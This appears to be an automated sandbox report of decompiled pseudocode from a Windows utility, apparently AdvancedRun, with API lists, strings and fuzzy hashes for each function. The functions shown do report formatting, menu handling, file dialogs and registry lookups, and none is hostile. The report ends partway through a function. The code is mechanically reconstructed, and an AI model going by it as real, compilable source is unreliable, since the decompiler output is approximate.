                                                                                                                				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                                                						_v8 = _t55;
                                                                                                                						_t57 =  &_v160;
                                                                                                                						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                                                							_t57 =  &_v68;
                                                                                                                						}
                                                                                                                						_t98 = _a8;
                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                						_v20 = _v20 | 0xffffffff;
                                                                                                                						_v16 = _v16 & 0x00000000;
                                                                                                                						_v12 = _t57;
                                                                                                                						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                                                						E0040ADC0(_v28,  &_v108);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                                                						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                                                						_t67 =  *(_t73 + 0x64);
                                                                                                                						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                							wcscat(_t67, L"&nbsp;");
                                                                                                                						}
                                                                                                                						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                						_push( &_v108);
                                                                                                                						_push(_v12);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t102 = _t102 + 0x1c;
                                                                                                                						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                						_t95 = _t95 + 1;
                                                                                                                					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t73, _a4, L"\r\n");
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                				struct tagMENUITEMINFOW _v0;
                                                                                                                				int _t24;
                                                                                                                				wchar_t* _t30;
                                                                                                                				intOrPtr _t32;
                                                                                                                				int _t34;
                                                                                                                				int _t42;
                                                                                                                				signed int _t47;
                                                                                                                				signed int _t48;
                                                                                                                
                                                                                                                				_t36 = __ecx;
                                                                                                                				_t48 = _t47 & 0xfffffff8;
                                                                                                                				E0040B550(0x203c, __ecx);
                                                                                                                				_t24 = GetMenuItemCount(_a8);
                                                                                                                				_t34 = _t24;
                                                                                                                				_t42 = 0;
                                                                                                                				if(_t34 <= 0) {
                                                                                                                					L13:
                                                                                                                					return _t24;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					memset( &_a50, 0, 0x2000);
                                                                                                                					_t48 = _t48 + 0xc;
                                                                                                                					_a36 =  &_a48;
                                                                                                                					_v0.cbSize = 0x30;
                                                                                                                					_a4 = 0x36;
                                                                                                                					_a40 = 0x1000;
                                                                                                                					_a16 = 0;
                                                                                                                					_a48 = 0;
                                                                                                                					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                					if(_t24 == 0) {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					if(_a48 == 0) {
                                                                                                                						L10:
                                                                                                                						_t56 = _a20;
                                                                                                                						if(_a20 != 0) {
                                                                                                                							_push(0);
                                                                                                                							_push(_a20);
                                                                                                                							_push(_a4);
                                                                                                                							_t24 = E0040605E(_t36, _t56);
                                                                                                                							_t48 = _t48 + 0xc;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					_t30 = wcschr( &_a48, 9);
                                                                                                                					if(_t30 != 0) {
                                                                                                                						 *_t30 = 0;
                                                                                                                					}
                                                                                                                					_t31 = _a16;
                                                                                                                					if(_a20 != 0) {
                                                                                                                						if(_a12 == 0) {
                                                                                                                							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                                                							_t32 =  *0x40fe20; // 0x0
                                                                                                                							_t31 = _t32 + 0x11558;
                                                                                                                							__eflags = _t32 + 0x11558;
                                                                                                                						} else {
                                                                                                                							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                							_t31 = _t17;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t24 = E00406025(_t31,  &_a48);
                                                                                                                					_pop(_t36);
                                                                                                                					goto L10;
                                                                                                                					L12:
                                                                                                                					_t42 = _t42 + 1;
                                                                                                                				} while (_t42 < _t34);
                                                                                                                				goto L13;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00402BEE(void* __ebx) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				int _v24;
                                                                                                                				int _v28;
                                                                                                                				void* _t27;
                                                                                                                				int _t31;
                                                                                                                				void* _t34;
                                                                                                                				int _t37;
                                                                                                                				int _t38;
                                                                                                                				int _t41;
                                                                                                                				int _t50;
                                                                                                                
                                                                                                                				_t34 = __ebx;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                                                					return _t27;
                                                                                                                				} else {
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					_v8 = GetSystemMetrics(0x4e);
                                                                                                                					_v12 = GetSystemMetrics(0x4f);
                                                                                                                					_t41 = GetSystemMetrics(0x4c);
                                                                                                                					_t31 = GetSystemMetrics(0x4d);
                                                                                                                					if(_v8 == 0 || _v12 == 0) {
                                                                                                                						_v8 = GetSystemMetrics(0);
                                                                                                                						_v12 = GetSystemMetrics(1);
                                                                                                                						_t41 = 0;
                                                                                                                						_t31 = 0;
                                                                                                                					} else {
                                                                                                                						_v8 = _v8 + _t41;
                                                                                                                						_v12 = _v12 + _t31;
                                                                                                                					}
                                                                                                                					_t50 = _v20 - _v28;
                                                                                                                					if(_t50 > 0x14) {
                                                                                                                						_t38 = _v24;
                                                                                                                						_t37 = _v16 - _t38;
                                                                                                                						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                                                							_t31 = _t31 + 0xfffffff6;
                                                                                                                							if(_t38 >= _t31) {
                                                                                                                								_t31 = _v28;
                                                                                                                								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                                                									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t31;
                                                                                                                				}
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155976603-0
                                                                                                                • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004036D5(void* __edi, void* __eflags) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char* _v24;
                                                                                                                				char _v28;
                                                                                                                				char* _v48;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				int _v64;
                                                                                                                				int _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				wchar_t* _v80;
                                                                                                                				intOrPtr _v84;
                                                                                                                				int _v92;
                                                                                                                				char* _v96;
                                                                                                                				intOrPtr _v104;
                                                                                                                				struct tagOFNA _v108;
                                                                                                                				void _v634;
                                                                                                                				long _v636;
                                                                                                                				void _v2682;
                                                                                                                				char _v2684;
                                                                                                                				void* __ebx;
                                                                                                                				char _t37;
                                                                                                                				intOrPtr _t38;
                                                                                                                				int _t46;
                                                                                                                				signed short _t54;
                                                                                                                
                                                                                                                				_v636 = 0;
                                                                                                                				memset( &_v634, 0, 0x208);
                                                                                                                				_v2684 = 0;
                                                                                                                				memset( &_v2682, 0, 0x7fe);
                                                                                                                				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                                                				_v12 = _t37;
                                                                                                                				_t38 =  *0x40cbf0; // 0x67
                                                                                                                				_v8 = _t38;
                                                                                                                				_v28 = E00405B81(0x227);
                                                                                                                				_v24 = L"*.cfg";
                                                                                                                				_v20 = E00405B81(0x228);
                                                                                                                				_v16 = L"*.*";
                                                                                                                				E00405236( &_v2684,  &_v28);
                                                                                                                				_t54 = 0xa;
                                                                                                                				_v60 = E00405B81(_t54);
                                                                                                                				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                                				_v48 =  &_v12;
                                                                                                                				_v96 =  &_v2684;
                                                                                                                				_v108 = 0x4c;
                                                                                                                				_v92 = 0;
                                                                                                                				_v84 = 1;
                                                                                                                				_v80 =  &_v636;
                                                                                                                				_v76 = 0x104;
                                                                                                                				_v72 = 0;
                                                                                                                				_v64 = 0;
                                                                                                                				_v56 = 0x80806;
                                                                                                                				_t46 = GetSaveFileNameW( &_v108);
                                                                                                                				if(_t46 != 0) {
                                                                                                                					wcscpy( &_v636, _v80);
                                                                                                                					return E0040365E(__edi, 1,  &_v636);
                                                                                                                				}
                                                                                                                				return _t46;
                                                                                                                			}































                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004036F6
                                                                                                                • memset.MSVCRT ref: 00403712
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                  • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                • wcscpy.MSVCRT ref: 004037C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                • String ID: L$cfg
                                                                                                                • API String ID: 275899518-3734058911
                                                                                                                • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                				struct _SYSTEMTIME _v20;
                                                                                                                				long _v276;
                                                                                                                				long _v532;
                                                                                                                				FILETIME* _t15;
                                                                                                                
                                                                                                                				_t15 = __eax;
                                                                                                                				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                                                						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                                                						wcscpy(_a4,  &_v276);
                                                                                                                						wcscat(_a4, " ");
                                                                                                                						wcscat(_a4,  &_v532);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L5:
                                                                                                                					wcscpy(_a4, 0x40c4e8);
                                                                                                                				}
                                                                                                                				return _a4;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                • wcscpy.MSVCRT ref: 00404F41
                                                                                                                • wcscat.MSVCRT ref: 00404F4E
                                                                                                                • wcscat.MSVCRT ref: 00404F5D
                                                                                                                • wcscpy.MSVCRT ref: 00404F71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                                				void _v514;
                                                                                                                				long _v516;
                                                                                                                				wchar_t* _t34;
                                                                                                                				signed int _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t34 = __edi;
                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				 *__edi =  *__edi & 0x00000000;
                                                                                                                				_t37 = _t36 + 0xc;
                                                                                                                				_t35 = 0;
                                                                                                                				do {
                                                                                                                					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                					_push(L"%2.2X");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v516);
                                                                                                                					L0040B1EC();
                                                                                                                					_t37 = _t37 + 0x10;
                                                                                                                					if(_t35 > 0) {
                                                                                                                						wcscat(_t34, " ");
                                                                                                                					}
                                                                                                                					if(_a8 > 0) {
                                                                                                                						asm("cdq");
                                                                                                                						if(_t35 % _a8 == 0) {
                                                                                                                							wcscat(_t34, L"  ");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					wcscat(_t34,  &_v516);
                                                                                                                					_t35 = _t35 + 1;
                                                                                                                				} while (_t35 < 0x80);
                                                                                                                				return _t34;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				char _v1028;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t16;
                                                                                                                				void* _t19;
                                                                                                                				intOrPtr* _t29;
                                                                                                                				char* _t31;
                                                                                                                
                                                                                                                				_t29 = __ecx;
                                                                                                                				_v516 = 0;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t16 = _t29;
                                                                                                                				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                                					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                				} else {
                                                                                                                					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                                				}
                                                                                                                				E00407343(_t16);
                                                                                                                				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                                				_t31 =  &_v516;
                                                                                                                				E00407250(_t31, _t19);
                                                                                                                				_push(_t31);
                                                                                                                				_push(L"<%s>\r\n");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v1028);
                                                                                                                				L0040B1EC();
                                                                                                                				return E00407343(_t29, _a4,  &_v1028);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                • <%s>, xrefs: 00407DF3
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00403B3C(intOrPtr _a4) {
                                                                                                                				void _v526;
                                                                                                                				char _v528;
                                                                                                                				void _v2574;
                                                                                                                				char _v2576;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t29;
                                                                                                                
                                                                                                                				_v2576 = 0;
                                                                                                                				memset( &_v2574, 0, 0x7fe);
                                                                                                                				_v528 = 0;
                                                                                                                				memset( &_v526, 0, 0x208);
                                                                                                                				E00404AD9( &_v528);
                                                                                                                				_push( &_v528);
                                                                                                                				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                                                				_push(0x3ff);
                                                                                                                				_push( &_v2576);
                                                                                                                				L0040B1EC();
                                                                                                                				_t37 = _a4 + 0xa68;
                                                                                                                				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                                                				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                                                				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                                                				_t29 = E0040467A(_t37);
                                                                                                                				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                                                				return _t29;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403B5D
                                                                                                                • memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                  • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                  • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                  • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                • API String ID: 1832587304-479876776
                                                                                                                • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
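                                                                                                                			int E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				int _v12;
                                                                                                                				short _v524;
                                                                                                                				char _v1036;
                                                                                                                				void* __edi;
                                                                                                                				void* _t34;

                                                                                                                				/* Build the version sub-block path: \StringFileInfo\<_a8>\<_a12> */
                                                                                                                				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                                				wcscat( &_v524, _a8);
                                                                                                                				wcscat( &_v524, L"\\");
                                                                                                                				wcscat( &_v524, _a12);
                                                                                                                				/* Look the value up in the version resource block passed in _a4 */
                                                                                                                				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				/* Subcalls: 00404923 references wcslen/memcpy, 004049A2 references lstrcpyW/lstrlenW */
                                                                                                                				_t34 =  &_v1036;
                                                                                                                				E00404923(0xff,  &_v1036, _v8);
                                                                                                                				E004049A2(_t34, __esi);
                                                                                                                				return 1;
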